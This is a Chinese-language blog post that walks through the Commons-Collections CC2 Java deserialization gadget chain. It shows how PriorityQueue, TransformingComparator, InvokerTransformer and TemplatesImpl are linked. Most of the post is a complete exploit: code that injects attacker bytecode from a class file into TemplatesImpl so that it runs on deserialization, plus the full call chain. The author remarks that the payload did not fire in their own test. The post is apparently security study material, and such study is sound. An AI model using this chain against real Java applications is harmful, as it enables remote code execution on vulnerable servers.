Featured image of post java反序列化之Commons-Collections-CC2链
Java反序列化 Java链

java反序列化之Commons-Collections-CC2链

java反序列化链子之cc2链

链子图

cc2链就是如何将InstatiateTransformerInvokeTransformer以及

InvokeTransformerTemplatesImpl串一起

InstatiateTransformerInvokeTransformer

transformer赋值为InvokerTransformer

InvokeTransformerTemplatesImpl

InvokeTransformertransformer是将通过反射,

这里可以反射调用TemplatesImplnewTransformer从而串在一起

怎么将TemplatesImpl传入?

add传入的会作为transform的参数

要调用到TemplatesImpl.newTransformer,add要传入TemplatesImpl的对象

1
2

priorityQueue.add(templates);
priorityQueue.add(templates);

完整exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

TemplatesImpl templates = new TemplatesImpl();
Class templatesClass = templates.getClass();
Field nameField = templatesClass.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates,"Y9sR");

Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
byte[] evil = Files.readAllBytes(Paths.get("E://calc.class"));
byte[][] codes = {evil};
bytecodesField.set(templates,codes);


InvokerTransformer invokerTransformer = new InvokerTransformer<>("newTransformer",new Class[]{},new Object[]{});
//        invokerTransformer.transform(templates);
TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));

PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(templates);
priorityQueue.add(templates);
Class c = TransformingComparator.class;
Field field1 = c.getDeclaredField("transformer");
field1.setAccessible(true);
field1.set(transformingComparator,invokerTransformer);
//        serialize(priorityQueue);
unserialize("ser.bin");

但是弹不了,很奇怪,调试的时候能进入TemplatesImpldefineClass

流程 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

PriorityQueue.readObject()
  PriorityQueue.heapify()
    PriorityQueue.siftDown()
      PriorityQueue.siftDownUsingComparator()
        TransformingComparator.compare()
          InvokerTransformer.transform()
            TemplatesImpl.newTransformer()
                TemplatesImpl.getTransletInstance()
                  TemplatesImpl.defineTransletClasses()
                    TemplatesImpl.defineClass()
                      ClassLoader.defineClass()
                        newInstance
最后更新于 Mar 03, 2025 07:35 UTC
comments powered by Disqus
© 2024 - 2025 一个俗人
使用 Hugo 构建
主题 StackJimmy 设计